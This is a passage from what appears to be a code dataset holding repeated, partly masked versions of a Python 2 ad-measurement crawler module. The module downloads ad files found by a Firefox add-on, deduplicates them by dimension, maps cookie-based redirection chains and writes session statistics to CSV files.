bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\n ack_queue):\n while True:\n try:\n task = input_queue.get()\n if len(task) == 1 and task[0] == 'STOP':\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n try:\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path,\n bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e:\n LOG.debug('Exception captured %s\\n\\n' % e)\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return\n\n\ndef build_nodes(jsonData):\n \"\"\"\n This function takes a JSON encoded output of the firefox addon and builds a\n call graph for the javascript/HTML redirections\n\n @rtype nodes: dict\n @return: A graph of redirection chains\n \"\"\"\n nodes = {}\n\n def _process_cookiestr(cookieStr):\n \"\"\"\n parses a dictionary of req/resp calls to extract the cookie information\n returns a list of cookies set on this domain\n \"\"\"\n cookie_list = []\n for cookie in cookieStr.split('\\n'):\n c = {}\n for cook in cookie.split(';'):\n token = cook.split('=', 1)\n if len(token) < 2:\n continue\n c[token[0]] = token[1]\n cookie_list.append(c)\n return cookie_list\n\n def _check_node(d):\n try:\n domain_node = nodes[d]\n except KeyError:\n isBug, bug_name, bug_type = ADREGEX.search(domain)\n domain_node = WebNode(domain, isBug, bug_name, bug_type)\n nodes[d] = domain_node\n return domain_node\n for domain, dval in jsonData.items():\n domain_node = _check_node(domain)\n cookie_list = []\n for info in dval:\n domainPath = info['domainPath']\n referrerPath = info['referrerPath']\n referrer = info['referrer']\n cookieBool = info['cookie']\n parsed_cookie = None\n if cookieBool:\n cookieStr = info['cookiestr']\n parsed_cookie = _process_cookiestr(cookieStr)\n cookie_list.append(parsed_cookie)\n domain_node.add_reqresp({'domainPath': domainPath, 'referrer':\n referrer, 'referrerPath': referrerPath, 'cookieList':\n parsed_cookie})\n referrer_node = _check_node(referrer)\n referrer_node.add_child(domain_node)\n domain_node.add_parent(referrer_node)\n domain_node.set_cookies(cookie_list)\n return nodes\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {}\n input_queue = Queue()\n worker_output_queue = Queue()\n ack_queue = Queue()\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n try:\n saved_location = 'Visit%d_%s%d' % (refresh_count, bug.\n get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n for i in range(num_of_workers):\n input_queue.put(('STOP',))\n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n while not worker_output_queue.empty():\n cbug = worker_output_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n", "step-3": "<mask token>\n\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count]\n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n error_bugs.append(bug)\n continue\n if bug.is_ad():\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump',\n '-X', bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump',\n '-Y', bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError:\n LOG.exception('swfdump error on file %s' %\n bug_filepath)\n else:\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output([\n 'identify', '-format', '\"%h\"',\n bug_filepath]).strip()\n width = subprocess.check_output(['identify',\n '-format', '\"%w\"', bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception('identify error on file %s' %\n bug_filepath)\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.\n get_filepath()):\n dup = m\n break\n if dup:\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else:\n ads[dup] = {test_site: bug_count}\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n else:\n target_bin[dimension].append(bug)\n ads[bug] = {test_site: bug_count}\n except KeyError:\n target_bin[dimension] = [bug]\n ads[bug] = {test_site: bug_count}\n return ads, error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try:\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n fwtr.write(\n '#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(\n new_uuidname, name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\n\ndef write_run_info(RUNINFO_DIR, session_date):\n fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)\n with open(fp, 'w') as fwtr:\n fwtr.write('OK')\n\n\ndef write_session_info(vmid, machineid, profile, session_date, train_mode,\n training_sites, test_sites, num_of_refresh, export_folder):\n train_category = training_sites.keys()[0]\n train_sites_to_visit = training_sites[train_category]\n with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr:\n fwtr.write('session_str : %s\\n' % session_date)\n fwtr.write('machine_info : %s\\n' % machineid)\n fwtr.write('vmid : %s\\n' % vmid)\n fwtr.write('profile : %s\\n' % profile)\n fwtr.write('train_mode : %s\\n' % train_mode)\n fwtr.write('num_of_refresh : %d\\n' % num_of_refresh)\n fwtr.write('training_topic : %s\\n' % train_category)\n fwtr.write('training_sites : ')\n for site in train_sites_to_visit:\n fwtr.write('%s, ' % site)\n fwtr.write('\\nnum_of_train_sites : %d\\n' % len(train_sites_to_visit))\n fwtr.write('test_sites : ')\n for site in test_sites:\n fwtr.write('%s, ' % site[1])\n fwtr.write('\\nnum_of_test_sites : %d\\n' % len(test_sites))\n\n\ndef generate_stats(results, ads, vmid, session_date, export_folder,\n process_ex_time):\n \"\"\"\n Generates stats on\n - uniq ads seen on the test sites\n - total number of ads seen on the test sites\n - total number of ads seen on all test sites\n - total number of uniq ads seen on all test sites\n \"\"\"\n try:\n os.makedirs(export_folder)\n except OSError:\n pass\n totalads = 0\n totaluniqads = len(ads)\n totalad_category = {}\n uniqad_category = {}\n with open(os.path.join(export_folder, 'session_bugs.csv'), 'w'\n ) as bugs_wtr:\n bugs_wtr.write(\n \"\"\"#Ad-UID, Website-URL, Refresh-Num, Training-Topic, Site-Context, BugCount, BugSrc\n\"\"\"\n )\n for train_category, cat_dict in results.items():\n totalad_category[train_category] = {}\n uniqad_category[train_category] = {}\n for test_site, bug_dict_list in cat_dict.items():\n total_ads = 0\n uniq_ads = []\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if bug.is_ad():\n uuid = bug.get_uuid()\n bugs_wtr.write(\n '{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.\n format(uuid, test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n total_ads += bugcount\n if bug not in uniq_ads:\n uniq_ads.append(bug)\n totalad_category[train_category][test_site] = total_ads\n uniqad_category[train_category][test_site] = len(uniq_ads)\n totalads += total_ads\n with open(os.path.join(export_folder, 'session_stats.csv'), 'w'\n ) as ses_wtr:\n ses_wtr.write('#VMID: %s\\n' % vmid)\n ses_wtr.write('#Session-Date: %s\\n' % session_date)\n ses_wtr.write('#Time to complete: %s\\n' % process_ex_time)\n ses_wtr.write('#Training Categories: %s\\n' % str(results.keys()))\n ses_wtr.write('#Total Number of ads: %d\\n' % totalads)\n ses_wtr.write('#Total Uniq ads: %d\\n\\n' % totaluniqads)\n ses_wtr.write(\n '#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\\n')\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n num_of_visit = len(bug_dict_list)\n ses_wtr.write('{0}, {1}, {2}, {3}, {4}\\n'.format(\n train_category, test_site, num_of_visit,\n totalad_category[train_category][test_site],\n uniqad_category[train_category][test_site]))\n\n\ndef export_ads(results, out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n export_ad_counter = 1\n with open(os.path.join(out_folder, 'ad_labelling.csv'), 'w') as fwtr:\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.\n format('Ad#', 'Company', 'FileType', 'Ad-Category',\n 'Website-URL', 'Refresh-Num', 'Training-Topic',\n 'Context-of-site', 'Total', 'Ad-src'))\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.\n get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write(\n \"\"\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9}, \n\"\"\"\n .format(file_name, bug.get_name(), bug.\n get_filetype(), '', test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or file_type.startswith('ASCII'\n ) or file_type.startswith('UTF-8 Unicode English'\n ) or file_type.startswith('very short'):\n bug_type = 'text'\n elif file_type.endswith('1 x 1') and file_type.startswith('GIF'):\n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\n\ndef curl_worker_legacy(args):\n output_dir = args[0]\n saved_file_name = args[1]\n path = args[2]\n bug = args[3]\n curl_result_queue = args[4]\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path, bug.\n get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n curl_result_queue.put(bug)\n\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue,\n result_queue, num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=\n bugaffiliation, bug_type=bugtype, matched_pattern=\n bugpattern, pathname=bugpathname)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n saved_location = 'Visit%d_%s%d' % (refresh_count, bugname,\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, ((\n output_dir, saved_location, save_to_path, bug,\n curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\n ack_queue):\n while True:\n try:\n task = input_queue.get()\n if len(task) == 1 and task[0] == 'STOP':\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n try:\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path,\n bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e:\n LOG.debug('Exception captured %s\\n\\n' % e)\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return\n\n\ndef build_nodes(jsonData):\n \"\"\"\n This function takes a JSON encoded output of the firefox addon and builds a\n call graph for the javascript/HTML redirections\n\n @rtype nodes: dict\n @return: A graph of redirection chains\n \"\"\"\n nodes = {}\n\n def _process_cookiestr(cookieStr):\n \"\"\"\n parses a dictionary of req/resp calls to extract the cookie information\n returns a list of cookies set on this domain\n \"\"\"\n cookie_list = []\n for cookie in cookieStr.split('\\n'):\n c = {}\n for cook in cookie.split(';'):\n token = cook.split('=', 1)\n if len(token) < 2:\n continue\n c[token[0]] = token[1]\n cookie_list.append(c)\n return cookie_list\n\n def _check_node(d):\n try:\n domain_node = nodes[d]\n except KeyError:\n isBug, bug_name, bug_type = ADREGEX.search(domain)\n domain_node = WebNode(domain, isBug, bug_name, bug_type)\n nodes[d] = domain_node\n return domain_node\n for domain, dval in jsonData.items():\n domain_node = _check_node(domain)\n cookie_list = []\n for info in dval:\n domainPath = info['domainPath']\n referrerPath = info['referrerPath']\n referrer = info['referrer']\n cookieBool = info['cookie']\n parsed_cookie = None\n if cookieBool:\n cookieStr = info['cookiestr']\n parsed_cookie = _process_cookiestr(cookieStr)\n cookie_list.append(parsed_cookie)\n domain_node.add_reqresp({'domainPath': domainPath, 'referrer':\n referrer, 'referrerPath': referrerPath, 'cookieList':\n parsed_cookie})\n referrer_node = _check_node(referrer)\n referrer_node.add_child(domain_node)\n domain_node.add_parent(referrer_node)\n domain_node.set_cookies(cookie_list)\n return nodes\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {}\n input_queue = Queue()\n worker_output_queue = Queue()\n ack_queue = Queue()\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n try:\n saved_location = 'Visit%d_%s%d' % (refresh_count, bug.\n get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n for i in range(num_of_workers):\n input_queue.put(('STOP',))\n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n while not worker_output_queue.empty():\n cbug = worker_output_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n", "step-4": "<mask token>\nLOG = logging.getLogger('logAdGrabber')\nADREGEX = AdRegEx()\n\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count]\n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n error_bugs.append(bug)\n continue\n if bug.is_ad():\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump',\n '-X', bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump',\n '-Y', bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError:\n LOG.exception('swfdump error on file %s' %\n bug_filepath)\n else:\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output([\n 'identify', '-format', '\"%h\"',\n bug_filepath]).strip()\n width = subprocess.check_output(['identify',\n '-format', '\"%w\"', bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception('identify error on file %s' %\n bug_filepath)\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.\n get_filepath()):\n dup = m\n break\n if dup:\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else:\n ads[dup] = {test_site: bug_count}\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n else:\n target_bin[dimension].append(bug)\n ads[bug] = {test_site: bug_count}\n except KeyError:\n target_bin[dimension] = [bug]\n ads[bug] = {test_site: bug_count}\n return ads, error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try:\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n fwtr.write(\n '#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(\n new_uuidname, name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\n\ndef write_run_info(RUNINFO_DIR, session_date):\n fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)\n with open(fp, 'w') as fwtr:\n fwtr.write('OK')\n\n\ndef write_session_info(vmid, machineid, profile, session_date, train_mode,\n training_sites, test_sites, num_of_refresh, export_folder):\n train_category = training_sites.keys()[0]\n train_sites_to_visit = training_sites[train_category]\n with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr:\n fwtr.write('session_str : %s\\n' % session_date)\n fwtr.write('machine_info : %s\\n' % machineid)\n fwtr.write('vmid : %s\\n' % vmid)\n fwtr.write('profile : %s\\n' % profile)\n fwtr.write('train_mode : %s\\n' % train_mode)\n fwtr.write('num_of_refresh : %d\\n' % num_of_refresh)\n fwtr.write('training_topic : %s\\n' % train_category)\n fwtr.write('training_sites : ')\n for site in train_sites_to_visit:\n fwtr.write('%s, ' % site)\n fwtr.write('\\nnum_of_train_sites : %d\\n' % len(train_sites_to_visit))\n fwtr.write('test_sites : ')\n for site in test_sites:\n fwtr.write('%s, ' % site[1])\n fwtr.write('\\nnum_of_test_sites : %d\\n' % len(test_sites))\n\n\ndef generate_stats(results, ads, vmid, session_date, export_folder,\n process_ex_time):\n \"\"\"\n Generates stats on\n - uniq ads seen on the test sites\n - total number of ads seen on the test sites\n - total number of ads seen on all test sites\n - total number of uniq ads seen on all test sites\n \"\"\"\n try:\n os.makedirs(export_folder)\n except OSError:\n pass\n totalads = 0\n totaluniqads = len(ads)\n totalad_category = {}\n uniqad_category = {}\n with open(os.path.join(export_folder, 'session_bugs.csv'), 'w'\n ) as bugs_wtr:\n bugs_wtr.write(\n \"\"\"#Ad-UID, Website-URL, Refresh-Num, Training-Topic, Site-Context, BugCount, BugSrc\n\"\"\"\n )\n for train_category, cat_dict in results.items():\n totalad_category[train_category] = {}\n uniqad_category[train_category] = {}\n for test_site, bug_dict_list in cat_dict.items():\n total_ads = 0\n uniq_ads = []\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if bug.is_ad():\n uuid = bug.get_uuid()\n bugs_wtr.write(\n '{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.\n format(uuid, test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n total_ads += bugcount\n if bug not in uniq_ads:\n uniq_ads.append(bug)\n totalad_category[train_category][test_site] = total_ads\n uniqad_category[train_category][test_site] = len(uniq_ads)\n totalads += total_ads\n with open(os.path.join(export_folder, 'session_stats.csv'), 'w'\n ) as ses_wtr:\n ses_wtr.write('#VMID: %s\\n' % vmid)\n ses_wtr.write('#Session-Date: %s\\n' % session_date)\n ses_wtr.write('#Time to complete: %s\\n' % process_ex_time)\n ses_wtr.write('#Training Categories: %s\\n' % str(results.keys()))\n ses_wtr.write('#Total Number of ads: %d\\n' % totalads)\n ses_wtr.write('#Total Uniq ads: %d\\n\\n' % totaluniqads)\n ses_wtr.write(\n '#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\\n')\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n num_of_visit = len(bug_dict_list)\n ses_wtr.write('{0}, {1}, {2}, {3}, {4}\\n'.format(\n train_category, test_site, num_of_visit,\n totalad_category[train_category][test_site],\n uniqad_category[train_category][test_site]))\n\n\ndef export_ads(results, out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n export_ad_counter = 1\n with open(os.path.join(out_folder, 'ad_labelling.csv'), 'w') as fwtr:\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.\n format('Ad#', 'Company', 'FileType', 'Ad-Category',\n 'Website-URL', 'Refresh-Num', 'Training-Topic',\n 'Context-of-site', 'Total', 'Ad-src'))\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.\n get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write(\n \"\"\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9}, \n\"\"\"\n .format(file_name, bug.get_name(), bug.\n get_filetype(), '', test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n export_ad_counter += 